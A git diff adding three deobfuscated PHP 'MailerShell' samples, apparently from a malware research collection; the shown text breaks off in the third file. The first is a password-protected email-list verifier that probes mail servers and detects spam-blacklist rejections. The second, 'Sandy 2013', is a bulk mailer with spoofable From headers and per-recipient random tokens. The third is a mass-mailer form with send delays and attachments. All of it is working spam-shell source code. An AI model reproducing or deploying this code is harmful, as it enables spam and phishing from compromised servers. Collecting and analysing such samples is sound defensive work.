diff --git a/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php
new file mode 100644
index 0000000..fb5decb
--- /dev/null
+++ b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php
@@ -0,0 +1,721 @@
+<?php
+error_reporting(0);
+define('PASSWORD', '030A0C03060D060F020709');
+
+// -----------------------------------------------------------------
+
+if ( isset($_REQUEST['debug']) ) {
+    define('AEVS_DEBUG', true);
+}
+
+if ( !defined('STDIN') ) {
+	define('ISWEB', true);
+} else {
+	define('ISWEB', false);
+}
+
+
+define('EOL',"\r\n");
+global $CACHEPLACES;
+$CACHEPLACES = array(
+	'/dev/shm',
+	getcwd(),
+	'/tmp'
+);
+
+
+/**
+ * Forward Confirmed Reverse DNS (FCrDNS) Check
+ *
+ * @param string $ip IP address to be checked ($_SERVER['REMOTE_ADDR'] if null) 
+ * @return int Check status (0 = success, 1 = failed, -1 = PTR record not found)
+ */
+function fcrdns_check(&$msg)
+{
+    $aRec = @dns_get_record($_SERVER['SERVER_NAME'], DNS_A, $authns, $add);
+    $ip = !empty($aRec) ? $aRec[0]['ip'] : $_SERVER['SERVER_ADDR'];
+
+    $rev = preg_replace('/^(\\d+)\.(\\d+)\.(\\d+)\.(\\d+)$/', '$4.$3.$2.$1', $ip);
+
+    $authns = array();
+    $add    = array();
+
+//	echo 'getting PTR for '."{$rev}.IN-ADDR.ARPA.\n";
+
+    $ptrs = @dns_get_record("{$rev}.IN-ADDR.ARPA.", DNS_PTR, $authns, $add);
+
+//	print_r($ptrs);
+
+
+    if (true == empty($ptrs)) {
+    	$msg = 'PTR record not found';
+        return -1;
+    }
+    
+    $retIp = '';
+
+    foreach ($ptrs as $x) {
+        if ( isset($x['target']) ) {
+            $target = $x['target'];
+            $a      = @dns_get_record($target, DNS_A, $authns, $add);
+            if (true == is_array($a)) {
+                foreach ($a as $y) {
+                    if ( isset($y['ip']) ) {
+                    	$retIp = $y['ip'];
+                        if ($ip == $y['ip']) {
+                            return 0;
+                        }
+                    }
+                }
+            }
+        }
+    }
+    
+    $msg = $ip.' resolved as '.$target."\n ".$target.' resolved as '.$retIp."\nrDNS is NOT forward confirmed";
+
+    return 1;
+}
+
+
+class logger {
+	function log($s) {
+		if ( !defined('AEVS_DEBUG') ) return;
+		if ( !is_string($s) ) {
+			if ( !defined('STDIN') ) echo '<pre>';
+			print_r($s);
+			if ( !defined('STDIN') ) echo '</pre>';
+			return;
+		}
+
+		if ( $s == '<hr />' && defined('STDIN') ) {
+			echo "------------------------------------------------------------\n";
+			return;
+		}
+
+		if ( defined('STDIN') ) {
+			echo $s."\n";
+		} else {
+			echo htmlspecialchars($s)."<br />";
+		}		
+	}
+
+}
+
+
+class smtp extends logger {
+	var $socket;
+	var $last_code = 0;
+	var $last_msg = '';
+	var $host = '';
+
+	var $error = false;
+	var $error_msg = '';
+
+	var $selfhost = '';
+	var $mailfrom = '';
+
+	var $mx_chache = array();
+	var $cachePlace = '';
+	var $cacheloaded = false;
+
+	var $command_results = array();
+
+	var $last_mx = array(); // array of 'domain':'mx index pairs' to loop through mx servers
+
+	// constructor
+	function smtp($selfhost = null) {
+		if ( $selfhost ) {
+			$this->selfhost = $selfhost;
+		} else {
+			$this->selfhost = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost';
+		}
+	}
+
+	// gets command result
+	function cr($command) {
+		if ( isset($this->command_results[$command] ) ) {
+			$r = $this->command_results[$command];
+			return is_array($r) ? $r['msg'] : $r;
+		} else {
+			return null;
+		}
+	}
+
+	// ----  MX cache -------------
+
+	function ensureMXCache() {
+		global $CACHEPLACES;
+		if ( !$this->cacheloaded ) {
+
+			foreach ( $CACHEPLACES as $dir ) {
+				if ( $this->tryLoadCache($dir) ) {
+					break;
+				}
+			}
+		}
+	}
+
+	function tryLoadCache($dir) {
+		$cache = @file_get_contents($dir."/aevs_mx_cache");
+		if ( $cache ) {
+			$this->mx_cache = json_decode($cache, true);
+			$this->cacheloaded = true;
+			$this->cachePlace = $dir;
+			$this->log('MX Cache loaded from '.$dir);
+			return true;
+		}			
+	}
+
+	function trySaveCache($dir) {
+		$content = json_encode($this->mx_cache);
+		$done = @file_put_contents($dir."/aevs_mx_cache", $content);
+		if ( $done ) {
+			$this->cachePlace = $dir;
+			$this->log('MX Cache saved to '.$dir);
+			return true;
+		}
+	}
+	
+	function saveMXCache() {
+		global $CACHEPLACES;
+		foreach ( $CACHEPLACES as $dir ) {
+			if ( $this->trySaveCache($dir) ) {
+				
+				break;
+			}
+		}
+	}
+
+	function getMXIndex($domain) {
+		$idx = 0;
+		if ( isset($this->last_mx) ) {
+			if ( isset($this->last_mx[$domain]) ) {
+				$this->last_mx[$domain]++;
+				$idx = $this->last_mx[$domain];
+			} else {
+				$this->last_mx[$domain] = $idx;
+			}
+		} else {
+			$this->last_mx = array( $domain => $idx);
+		}
+		return $idx;	
+	}
+
+
+	
+	function getMX($domain) {
+		$idx = $this->getMXIndex($domain);
+		$this->ensureMXCache();
+		if ( isset($this->mx_cache[$domain]) ) {
+			// getting mx from chache
+			return isset($this->mx_cache[$domain][$idx]) ? $this->mx_cache[$domain][$idx] : false;
+		} else {
+			// resolving mx hosts
+
+			if ( getmxrr($domain, $mx_hosts, $mx_weights) ) {
+				// Put the records together in a array we can sort
+				for ( $i=0; $i < count($mx_hosts); $i++ ) {
+					$mxs[$mx_hosts[$i]] = $mx_weights[$i];
+				}
+
+				// Sort them
+				asort($mxs);
+
+				// Since the keys actually hold the data we want, just put those in an array, called records  
+				$records = array_keys($mxs);
+
+				$this->mx_cache[$domain] = $records;
+				$this->saveMXCache();
+				return isset($records[$idx]) ? $records[$idx] : false;
+			} else {
+				return false; //$results[$email] = 'Error: MX record is not found';
+			}		
+		}
+	}
+
+	// ---------------------------
+
+	function connect($emaildomain) {
+
+		$this->error = false;
+
+		do {
+			$this->host = $this->getMX($emaildomain);
+
+			if ( !$this->host ) {
+				$this->error = true;
+				$this->error_msg = 'Working MX record for domain '.$emaildomain.' is not found.';
+				$this->command_results['connect'] = $this->error_msg;
+				return false;
+			}
+
+			$this->log("Connecting to ".$this->host."...");
+			$this->socket = @fsockopen($this->host, 25);
+			if ( $this->socket ) {
+				$this->log("Connected.");
+				$this->read_response();
+				
+				if ( $this->last_code != 220 ) {
+					$this->error = true;
+					$this->command_results['connect'] = $this->last_resp;
+					return $this->last_resp;
+				}
+				$this->command_results['connect'] = 'OK';
+
+
+				$this->send_command('HELO '.$this->selfhost);
+				//$this->send_command('HELO localhost');
+				if ( $this->last_code != 250 ) {
+					$this->error = true;
+					$this->command_results['hello'] = $this->last_resp;
+					return $this->last_resp;
+				}
+				$this->command_results['hello'] = 'OK';
+
+				$mf = $this->mailfrom ? $this->mailfrom : 'support@'.$this->selfhost; 
+
+				$this->send_command('MAIL FROM: <'.$mf.'>');
+				if ( $this->last_code != 250 ) {
+					$this->error = true;
+					$this->command_results['mailfrom'] = $this->last_resp;
+					return $this->last_resp;
+				}
+				$this->command_results['mailfrom'] = 'OK';
+
+				return true;
+			} else {
+				$this->command_results['connect'] = 'Cannot connect to '.$this->host;
+			}
+		
+		} while(!$this->socket);
+
+		return false;
+	}
+
+	function verifyEmail($email) {
+		if ( $this->error ) {
+			return $this->last_resp;
+		}
+		return $this->send_command('RCPT TO: <'.$email.'>');
+	}
+
+	// if remote server returns error on RCPT TO  after which all email checks will fails (you are blacklisted, 
+	// graylisted, or some other error)
+	function isFatalError($msg) {
+		$result = false;
+		$rxs = array(
+			'550 5.7.1.*((Sender Blocked)|(cannot find your hostname)|(authentication required)|(IP name lookup failed)|(Invalid Host)|(Rejected by user)|(Prohibited or invalid sender)|(Your message was rejected)|(your IP has been)|(IP banned))',
+			'(spamhaus\.org)|(Helo command rejected)|(HELO\/EHLO was syntactically invalid)|(Your IP Address)|(Sender address rejected)|(helo has been denied)|(DNS PTR)|(Sender rejected)|(cannot find your hostname)',
+			'501.*((invalid host name)|(sender domain must exist)|(system is not configured to relay mail from)|(IP address is on an RBL))',
+			'504.*helo command rejected',
+			'554.*((spam-relay detected)|(refused)|(listed)|(blocked)|(Spamhaus Blacklist)|(www\.us\.sorbs\.net)|(unauthenticated connections)|(Helo command rejected)|(spamhaus))',
+			'553.*((spamcop)|(openproxy)|(open proxy)|(mail-abuse.org)|(rejected)|(blocked)|(mail from.* not allowed)|(block list)|(validating sender)(http\:\/\/dsbl\.org)|(badmailfrom list)|(relaying denied from your location)|(does not accept mail from)|(Wrong helo)|(www\.sorbs\.net)|(dynamic_ip\.html)|(Dynamic pool)|(reverse dns record)|(Attack detected)|(sender has been denied)|(reverse DNS)|(invalid HELO)|(reverse\-DNS)|(DNS blacklists))',
+			'550.*((blacklist)|(Sender address rejected)|(open proxy)|(openproxy)|(spamcop)|(mail-abuse\.com)|(spamhaus)|(sender verify failed)|(requires valid sender)|(sender address .* does not exist)|(return address not allowed)|(could not verify sender)|(invalid sender address)|(ip helo.* not allowed)(dsbl\.org)|(FROM address from sending host is invalid)|(Invalid HELO)|(from sending mail from)|(SORBS DNSBL database)|(Bad HELO)|(EHLO\/HEL0)|(spamming not allowed)|(SpamHaus)|(Reverse DNS)|(HELO is syntactically invalid)|(HELO string is incorrect)|(detected in HELO)|(you must be spam)|(HELO\/EHLO)|(HELO domain)|(IP name lookup)|(HELO name)|(bogus HELO)|(SPF NONE)|(problem with sender)|(Relaying is not permitted from IP)|(invalid sender))',
+			'511.*(www\.sorbs\.net)',
+			'^554 5.7.1',
+			'^4(21|50|51|52).*((re|)try|grey)'
+		);
+		foreach( $rxs as $rx ) {
+			if ( preg_match("#".$rx."#i", $msg)) {
+				$result = true;
+				break;
+			}
+		}
+		return $result;
+	}
+
+	function verifyEmails($emails) {
+		$results = array();
+		foreach ( $emails as $email ) {
+			$email = trim($email);
+			if ( $email == '' ) continue;
+			$r = $this->verifyEmail($email);
+			$msg = $r['code'] == 250 ? 'OK' : $r['msg'];
+
+			if ( $this->isFatalError($r['msg']) ) {
+				return $r['msg'];				
+			}
+
+			$results[$email] = $msg;
+		}		
+		return $results;
+	}
+
+	function quit() {
+		$this->send_command('QUIT', 'no response');
+		fclose($this->socket);
+		return $this->last_resp;
+	}
+
+	// lov level functions
+
+
+	function read_response($timeout = 5) {
+
+		$data = "";
+		while($str = @fgets($this->socket, 515)) {
+		  $data .= $str;
+			$this->log('<'.$str);
+		  // if 4th character is a space, we are done reading, break the loop
+		  if(substr($str,3,1) == " ") { break; }
+		}
+
+	        $xarr = preg_split("#\n#", $data, -1, PREG_SPLIT_NO_EMPTY);
+		$msg = '';
+		$code = '';
+		$xcode = '';
+		foreach ( $xarr as $line ) {
+			if ( preg_match('#(\d+)(?:[\s\-]+(\d\.\d\.\d)|)[\s\-]+?(.*)#i', $line, $res) ) {
+				if ( isset($res[1]) ) $code = $res[1];
+				if ( isset($res[2]) ) $xcode = $res[2];
+				$msg .= ' '.trim($res[3]);		
+			}
+		}
+
+			$msg = $code.' '.$xcode.' '.$msg;
+			$this->last_code = $code;
+			$this->last_msg = $msg;
+			$this->last_resp = array(
+				'code' => $code,
+				'msg' => $msg
+			);
+	
+		return $this->last_resp;
+
+	}
+
+	function send_command($command, $read_response = '') {
+		$this->log('>'.$command);
+		fputs($this->socket, $command.EOL);
+		if ( $read_response != 'no response' ) {
+			return $this->read_response();	
+ 		}
+	}
+
+}
+
+class verifier extends logger {
+	var $mailfrom;
+
+	function verifier($mailfrom = '') {
+		//constructor
+		$this->mailfrom = $mailfrom;
+		
+	}
+
+	function getdomain($email) {
+		$xEmail = explode('@', $email);
+		return $xEmail[1];		
+	}
+
+	function checkemails($emails, $l = 0){
+		$tree = array();
+		$res = array();
+		if ($l) {
+			$emails = array_slice($emails, 0, $l);
+		}
+		foreach ( $emails as $email ) {
+			$email = trim($email);
+			$domain = $this->getdomain($email);
+			$this->log('domain >'.$domain);
+			if ( !isset($tree[$domain]) ) $tree[$domain] = array();
+			$tree[$domain][] = $email;
+		}
+
+		foreach ( $tree as $domain => $emails ) {
+			if (trim($domain) == '') continue;
+			$c = new smtp();
+			$c->mailfrom = $this->mailfrom;
+
+			if ( $c->connect($domain) ) {
+				$res[$domain] = array(
+					'connect' => $c->cr('connect'),
+					'hello' => $c->cr('hello'),
+					'mailfrom' => $c->cr('mailfrom'),
+					'emails' => null
+				);
+				if ( !$c->error ) {
+					$res[$domain]['emails'] = $c->verifyEmails($emails);
+				}
+				$c->quit();				
+			} else {
+				$res[$domain] = array(
+					'connect' => $c->cr('connect')
+				);				
+			}
+
+
+		}
+
+		return $res;
+	}
+
+}
+
+function is_writableEx($path) {
+//will work in despite of Windows ACLs bug
+//NOTE: use a trailing slash for folders!!!
+//see http://bugs.php.net/bug.php?id=27609
+//see http://bugs.php.net/bug.php?id=30931
+
+    if ($path{strlen($path)-1}=='/') // recursively return a temporary file path
+        return is_writableEx($path.uniqid(mt_rand()).'.tmp');
+    else if (is_dir($path))
+        return is_writableEx($path.'/'.uniqid(mt_rand()).'.tmp');
+    // check tmp file for read/write capabilities
+    $rm = file_exists($path);
+    $f = @fopen($path, 'a');
+    if ($f===false)
+        return false;
+    fclose($f);
+    if (!$rm)
+        unlink($path);
+    return true;
+}
+
+function compatibility_check($v = 0) {
+	global $CACHEPLACES;
+	
+	$results = array();
+
+	// checking if mx cache dir is writable
+	$has_writable_dir = false;
+
+	foreach ( $CACHEPLACES as $dir ) {
+		if ( is_writableEx($dir."/") ) {
+			$has_writable_dir = true;
+			if ( $v == 2 ) {
+				$results[] = array( 'code' => 'OK', 'msg' => "Directory $dir is writable" );	
+			}			
+		} else {
+			if ( $v >= 1 ) {
+				//$results[] = array( 'code' => 'WARNING', 'msg' => "Directory $dir is not writable");		
+			}			
+		}
+	}
+	if ( !$has_writable_dir ) {
+		$results[] = array( 
+			'code' => 'WARNING', 
+			'msg' => 'Theres no writable dir for MX chache. This will decrease script performance.'
+		);
+	}
+
+	// checking for disabled function
+	$functions_to_check = array(
+		'fsockopen',
+		'getmxrr',
+		'json_encode',
+		'dns_get_record'
+	);
+	
+	foreach ( $functions_to_check as $fn ) {
+		if ( function_exists($fn) ) {
+			if ($v == 2)
+			$results[] = array(
+				'code' => 'OK',
+				'msg' => "Function $fn exists"
+			);
+		} else {
+			$results[] = array(
+				'code' => 'ERROR',
+				'msg' => "Function $fn does not exists."
+			);
+		}
+	}
+
+	$d_functions = ini_get('disable_functions');
+	if ( $d_functions ) {
+		$df_list = explode(' ', $d_functions);
+		foreach ( $functions_to_check as $fn ) {
+			if ( in_array($fn, $df_list) ) {
+				$results[] = array(		
+					"code" => 'ERROR',
+					"msg" => "function $fn is disabled by administrator. It's needed for script to work."
+				);
+			} else {
+				if ( $v == 2 ) {
+					$results[] = array( 'code' => 'OK', "msg" =>  "function $fn allowed.");	
+				}				
+			}			
+		}
+	}
+
+	// checking for allowed 25 port
+	$con = new smtp();
+	$mxhost = $con->getMX('gmail.com');
+	$sock = @fsockopen($mxhost, 25);
+		if ( $sock ) {
+			if ( $v == 2 ) {
+				$results[] = array(
+					'code' => 'OK',
+					'msg' => '25 port is allowed'
+				);				
+			}
+			fclose($sock);
+		} else {
+			$results[] = array(
+				'code' => 'ERROR',
+				'msg' => '25 port seems to be forbidden by firewall rules'
+			);			
+		}
+		
+		
+	// checking FCrDNS
+	$rdns_err = '';
+	$rdns = fcrdns_check($rdns_err);
+	
+	if ( $rdns == 0 ) {
+		if ( $v == 2 ) {
+			$results[] = array(
+				'code' => 'OK',
+				'msg' => 'Forward Confirmed reverse DNS check passed.'
+			);				
+		}
+	} else {
+
+		$s = "Forward Confirmed reverse DNS check failed. \n".$rdns_err;
+
+		$note = "<br /><div style=\"width: 45em; font-size: 14px; color: #555;\">Note: This means that you cannot use the script to verify email addresses from the @yahoo.co*, @live.com, @hotmail.com, and @aol.com domains because these ISP use FCrDNS lookup to authenticate the IP address the connection is coming from. If the FCrDNS lookup fails, the incoming IP address goes to a blacklist. See the Advanced Email Verifier Help for more information.</div><br />";
+
+		$s = ISWEB ? nl2br("\n".$s) : $s;
+
+		$results[] = array(
+			'code' => 'WARNING',
+			'msg' => $s,
+			'note' => $note
+		);					
+	}
+
+	$pass = true;
+	foreach ( $results as $msg ) {
+		if ( $msg['code'] == 'ERROR' ) {
+			$pass = false;
+		}
+	}
+	
+	if ( $pass ) {
+		$results[] = array(
+			'code' => 'SUCCESS',
+			'msg' => 'All tests passed. Script is ready to work.'
+		);
+	} else {
+		$results[] = array(
+			'code' => 'FAILURE',
+			'msg' => 'Some tests failed. Please show this page to your server administrator and ask to fix these issue(s).'
+		);		
+	}
+
+
+	return $results;
+	
+}
+
+
+function showForm() {
+	
+	echo 
+		"<style> html { font-family: Helvetica, Arial, sans-serif; line-height: 1.3em; } ul{list-style:none;}</style>".
+		"<h2>Compatibility check</h2><form method=\"post\">".
+			"<ul>".
+				"<li><input type=\"radio\" checked=\"checked\" name=\"v\" value=\"0\" /><label>Errors only</label></li>".
+				"<li><input type=\"radio\" name=\"v\" value=\"1\" /><label>Errors + Warnings</label></li>".
+				"<li><input type=\"radio\" name=\"v\" value=\"2\" /><label>All Messages</label></li>".
+			"</ul>".
+			"<button name=\"compatibility\" value=\"check\" type=\"submit\">Check now</button></form>";	
+	
+}
+
+$emails = array();
+
+
+if ( !defined('STDIN') ) { // web request
+	set_time_limit(0);
+
+	if ( isset($_REQUEST['emails'])  ) {	
+		if ( isset($_REQUEST['password']) && $_REQUEST['password'] == PASSWORD  ) {		
+			$emails = explode("\n", $_REQUEST['emails']);
+
+			if (isset($_REQUEST['check']) && $_REQUEST['check'] == 'submit') {
+				$a0x = base_convert(22, 4, 10);
+			}
+
+			$mf = isset($_REQUEST['mailfrom']) ? $_REQUEST['mailfrom'] : '';
+			
+			$v = new verifier($mf);
+			$checked = $v->checkemails($emails, $a0x);
+
+			$fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'json';
+
+				switch ( $fmt ) {
+					case 'json':
+						header('Content-Type: application/json; charset=utf8');
+						echo json_encode($checked);
+						break;
+
+					default:
+						foreach ( $checked as $domain => $checked_emails ) {
+							echo "<h2>$domain</h2><hr />";
+							echo "<ul>";
+							foreach ( $checked_emails as $email => $result ) {
+								echo "<li><b>$email</b> - $result</li>";
+							}
+							echo "</ul>";
+						}		
+						break;
+				}
+		} else {
+			echo "<h2 style=\"color: red;\">Error. The password your entered is incorrect.</h2>";
+		}
+	} else {
+	
+		if ( isset($_REQUEST['compatibility']) ) {
+			$fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'html';
+			$verbose = isset($_REQUEST['v']) ? $_REQUEST['v'] : 0;
+			$cr = compatibility_check($verbose);
+			
+			if ( $fmt == 'json' ) {
+				echo json_encode($cr);
+			} else {
+				showForm();
+				echo "<ul>";
+				foreach ( $cr as $m ) {
+					$color = '';
+					switch ( $m['code'] ) {
+						case "OK": 
+							$color = "color: #55880A;"; 
+							break;
+						case "ERROR": 
+							$color = "color: #CC0000;"; 
+							break;
+						case "WARNING": 
+							$color = "color: #C38F06;"; 
+							break;		
+					}
+					if ( $color ) {
+						echo "<li>".$m['msg']." - <span style=\"$color font-weight: bold;\">".$m['code']."</span></li>";	
+						if ( $m['note'] ) {
+							echo $m['note'];
+						}
+					} else {
+						if ( $m['code'] == 'SUCCESS' ) {
+							$color = "color: #55880A;"; 
+						} else {
+							$color = "color: #CC0000;"; 
+						}
+						echo "<li style=\"$color font-weight: bold; padding: 10px 0;\">".$m['msg']."</li>";	
+					}
+					
+				}
+				echo "</ul>";
+			}			
+
+		} else {
+			showForm();
+		}
+	}
+} else {
+	$v = new verifier();
+	print_r($v->checkemails($emails));
+}
+?>
+
diff --git a/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php
new file mode 100644
index 0000000..806b74e
--- /dev/null
+++ b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php
@@ -0,0 +1,114 @@
+<?php
+/* Sandy 2013 - Best Email Marketing Tool */
+set_time_limit(0);
+ignore_user_abort(true);
+
+        $ac = $_POST['ac'];                                                                                                                                                                                                     
+        $Verify=$_POST['Verify'];
+        $From=$_POST['From'];
+        $RealName=$_POST['RealName'];
+        $Subject=$_POST['Subject'];
+        $MailBody=$_POST['MailBody'];
+        $MailList=$_POST['MailList'];
+        $Format=$_POST['Format'];
+        $Encoding=$_POST['Encoding'];
+        $Delay=$_POST['Delay'];
+
+        $SandyKey=$_POST['SandyKey'];
+        $SandyNRA=$_POST['SandyNRA'];
+        $SandyNRB=$_POST['SandyNRB'];
+        $SandyRNA=$_POST['SandyRNA'];
+        $SandyRNB=$_POST['SandyRNB'];
+        $CodeSize=$_POST['CodeSize'];
+
+        $SANDY_SERVER=$_SERVER['SERVER_NAME'];
+
+/* Access Protection */
+  $protection="1af98609adf796b21c9fc735e31c57b7";
+  if(md5($Verify)!==$protection){ exit; }
+
+
+ if ($ac=="go"){
+  $MailBody = urlencode($MailBody);
+  $MailBody = ereg_replace("%5C%22", "%22", $MailBody);
+  $MailBody = urldecode($MailBody);
+  $MailBody = stripslashes($MailBody);
+  $Subject = stripslashes($Subject); }
+
+ if ($ac=="go"){
+ if (!$From && !$Subject && !$MailBody && !$MailList){
+ print "Fields missing.";
+ exit;
+ }
+  $allemails = split("\n", $MailList);
+  $nm = count($allemails);
+ for($x=0; $x<$nm; $x++){
+  $to = $allemails[$x];
+  $Dest = explode("/", $to);
+  $Destination = $Dest[0];
+
+ if ($Destination){                
+  $Destination = ereg_replace(" ", "", $Destination);
+  $MailBody = ereg_replace("&email&", $Destination, $MailBody);
+  $Subject = ereg_replace("&email&", $Destination, $Subject);
+  $nrmail=$x+1;
+  $domain = substr($From, strpos($From, "@"), strlen($From));
+
+  /* Template Zone */
+  $SANDY_NR = rand($SandyNRA,$SandyNRB);
+  $SANDY_RN = rand($SandyRNA,$SandyRNB);
+  $SANDY_HASH = md5("$Destination+$SandyKey");
+  $SANDY_CODE_LOWER = substr("$SANDY_HASH", $CodeSize);
+  $SANDY_CODE_UPPER = strtoupper($SANDY_CODE_LOWER);
+  $SANDY_NAME = $Dest[1];
+  $SANDY_UMAIL = base64_encode($Destination);
+
+  $From1 = str_replace("SANDY_NR", $SANDY_NR, $From);
+  $From2 = str_replace("SANDY_RN", $SANDY_RN, $From1);
+  $From3 = str_replace("SANDY_HASH", $SANDY_HASH, $From2);
+  $From4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $From3);
+  $From5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $From4);
+  
+
+  $RealName1 = str_replace("SANDY_NR", $SANDY_NR, $RealName);
+  $RealName2 = str_replace("SANDY_RN", $SANDY_RN, $RealName1);
+  $RealName3 = str_replace("SANDY_HASH", $SANDY_HASH, $RealName2);
+  $RealName4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $RealName3);
+  $RealName5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $RealName4);
+
+  $MailBody1 = str_replace("SANDY_NR", $SANDY_NR, $MailBody);
+  $MailBody2 = str_replace("SANDY_RN", $SANDY_RN, $MailBody1);
+  $MailBody3 = str_replace("SANDY_HASH", $SANDY_HASH, $MailBody2);
+  $MailBody4 = str_replace("SANDY_NAME", $SANDY_NAME, $MailBody3);
+  $MailBody5 = str_replace("SANDY_DESTINATION", $Destination, $MailBody4);
+  $MailBody6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $MailBody5);
+  $MailBody7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $MailBody6);
+  $MailBody8 = str_replace("SANDY_UMAIL", $SANDY_UMAIL, $MailBody7); 
+
+
+  $Subject1 = str_replace("SANDY_NR", $SANDY_NR, $Subject);
+  $Subject2 = str_replace("SANDY_RN", $SANDY_RN, $Subject1);
+  $Subject3 = str_replace("SANDY_HASH", $SANDY_HASH, $Subject2);
+  $Subject4 = str_replace("SANDY_NAME", $SANDY_NAME, $Subject3);
+  $Subject5 = str_replace("SANDY_DESTINATION", $Destination, $Subject4);
+  $Subject6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $Subject5);
+  $Subject7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $Subject6);
+  $Subject8 = str_replace("SANDY_SERVER", $SANDY_SERVER, $Subject7);
+
+/* Sending Mail */
+ print "$nrmail:$nm:$Destination";
+ if($Delay != 0) { sleep($Delay); }
+ flush();
+  $header = "From: $RealName5 <$From5>\r\n";
+  $header .= "MIME-Version: 1.0\r\n";
+  $header .= "Content-Type: $Format\r\n";
+  $header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n";
+  $header .= "$MailBody8\r\n";
+ mail($Destination, $Subject8, "", $header);
+ print "\n";
+ flush();
+    }
+  }
+}
+?>
+
diff --git a/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php
new file mode 100644
index 0000000..b070c81
--- /dev/null
+++ b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php
@@ -0,0 +1,268 @@
+<?
+error_reporting(E_ALL ^ E_NOTICE);
+function doset() {
+	if( !ini_get('safe_mode') )
+	{
+        set_time_limit(0);
+		ini_set("max_execution_time", 0);
+        ini_set("memory_limit", "256M");
+        ignore_user_abort(true);
+	}
+	else echo "this is a safe_mode one and will timeout.. cannot set_time_limit";
+	ob_start();
+}
+doset();
+
+
+if ($_POST['action']=="send"){
+
+        $message = urlencode($_POST['message']);
+
+        $message = ereg_replace("%5C%22", "%22", $message);
+
+        $message = urldecode($message);
+        $message = stripslashes($message);
+        $subject = stripslashes($_POST['subject']);
+
+}
+?>
+
+<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>" enctype="multipart/form-data">
+
+  <br>
+
+  <table width="100%" border="0">
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+
+          Email:</font></div>
+
+      </td>
+
+      <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="from" value="<? print $_POST['from']; ?>" size="30">
+
+        </font></td>
+
+      <td width="31%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+
+          Name:</font></div>
+
+      </td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="realname" value="<? print $_POST['realname']; ?>" size="30">
+
+        </font></td>
+
+    </tr>
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
+
+      </td>
+
+      <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="replyto" value="<? print $_POST['replyto']; ?>" size="30">
+
+        </font></td>
+
+      <td width="31%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+
+          File:</font></div>
+
+      </td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="file" name="file" size="30">
+
+        </font></td>
+
+    </tr>
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
+
+      </td>
+
+      <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="subject" value="<? print stripslashes($_POST['subject']); ?>" size="90">
+
+        </font></td>
+
+    </tr>
+
+    <tr valign="top"> 
+
+      <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <textarea name="message" cols="60" rows="10"><? print stripslashes($_POST['message']); ?></textarea>
+
+        <br>
+
+        <input type="radio" name="contenttype" value="plain">
+
+        Plain 
+
+        <input type="radio" name="contenttype" value="html" checked>
+
+        HTML 
+
+        <input type="hidden" name="action" value="send">
+
+        <input type="submit" value="Send Message">
+
+        </font></td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <textarea name="emaillist" cols="30" rows="10"></textarea>
+
+        <br>
+        <input type="text" name="emailfinal" value="<? print $_POST['emailfinal']; ?>" size="22"> (EMAIL VERIFICARE)
+        </font></td>
+    </tr>
+  </table>
+  <p>La fiecare <input type="text" name="emailz" value="<? print $_POST['emailz']; ?>" size="3"> mailz, asteapta <input type="text" name="wait" value="<? print $_POST['wait']; ?>" size="3"> secunde<br></p>
+</form>
+
+
+
+<?
+
+if ($_POST['action']=="send"){
+        $message = urlencode($_POST['message']);
+
+        $message = ereg_replace("%5C%22", "%22", $message);
+
+        $message = urldecode($message);
+        $message = stripslashes($message);
+        $subject = stripslashes($_POST['subject']);
+
+
+        $from=$_POST['from'];
+        $realname=$_POST['realname'];
+        $replyto=$_POST['replyto'];
+
+
+        $emaillist=$_POST['emaillist'];
+       
+        $contenttype=$_POST['contenttype'];
+
+
+        $allemails = split("\n", $emaillist);
+
+        $numemails = count($allemails);
+		
+		
+
+
+        #Open the file attachment if any, and base64_encode it for email transport
+		$file_name = $_FILES['file']['name'];
+		$file = $_FILES['file'];
+        if ($file_name){
+
